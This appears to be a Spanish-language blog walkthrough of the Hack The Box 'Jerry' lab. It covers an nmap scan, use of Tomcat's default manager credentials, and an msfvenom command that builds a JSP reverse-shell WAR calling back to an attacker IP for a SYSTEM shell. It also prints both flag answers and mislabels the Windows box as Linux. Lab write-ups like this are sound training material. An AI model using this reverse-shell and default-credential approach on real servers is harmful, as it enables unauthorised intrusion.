Entrada

Jerry

Publicado
Hack The Box
Hack The Box
Por Pablo Martínez Rivas
2 min de lectura
Jerry

Jerry Linux · Easy

Task 1

Which TCP port is open on the remote host?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

┌──(pmartinezr㉿kali)-[~]
└─$ nmap -p- -sCVS -T 5 --min-rate 500 10.129.136.9 -vv    
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-09 12:07 CET
NSE: Loaded 157 scripts for scanning.
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE REASON          VERSION
8080/tcp open  http    syn-ack ttl 127 Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

NSE: Script Post-scanning.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.31 seconds
           Raw packets sent: 131124 (5.769MB) | Rcvd: 51 (2.228KB)

8080

Task 2

Which web server is running on the remote host? Looking for two words.

Apache Tomcat

Task 3

Which relative path on the webserver leads to the Web Application Manager?

Si entramos a la web vamos a encontrar el siguiente enlace http://10.129.136.9:8080/manager/html que nos pedirá credneciales

/manager/html

Task 4

What is the valid username and password combination for authenticating into the Tomcat Web Application Manager? Give the answer in the format of username:password

Al intentar loguearnos nos redirige a una página que nos muestra las credenciales

1
2

<role rolename="admin-gui"/>
<user username="tomcat" password="s3cret" roles="admin-gui"/>

tomcat:s3cret

Task 5

Which file type can be uploaded and deployed on the server using the Tomcat Web Application Manager?

Al acceder a List Applications vemos que nos permite subir archivos WAR

WAR

Submit the flag located on the user’s desktop.

1
2
3
4
5
6
7
8
9

┌──(pmartinezr㉿kali)-[~/htb/blue]
└─$ msfvenom --list payloads | grep jsp          
    java/jsp_shell_bind_tcp                                            Listen for a connection and spawn a command shell
    java/jsp_shell_reverse_tcp                                         Connect back to attacker and spawn a command shell

┌──(pmartinezr㉿kali)-[~/htb/jerry/proyect_war]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.15.224 LPORT=4444 -f war > shell.war
Payload size: 1090 bytes
Final size of war file: 1090 bytes

Generamos una reverse shell adecuada a Tomcat con msvenom.

1
2
3
4
5
6
7
8
9
10
11

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

c:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt
type "2 for the price of 1.txt
"user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e

7004dbcef0f854e0fb401875f26ebd00

Submit the flag located on the administrator’s desktop.

04a8b36e1545a455393d067e772fe90e

achivement

writeup, hackthebox
hackthebox jerry
Esta entrada está licenciada bajo CC BY 4.0 por el autor.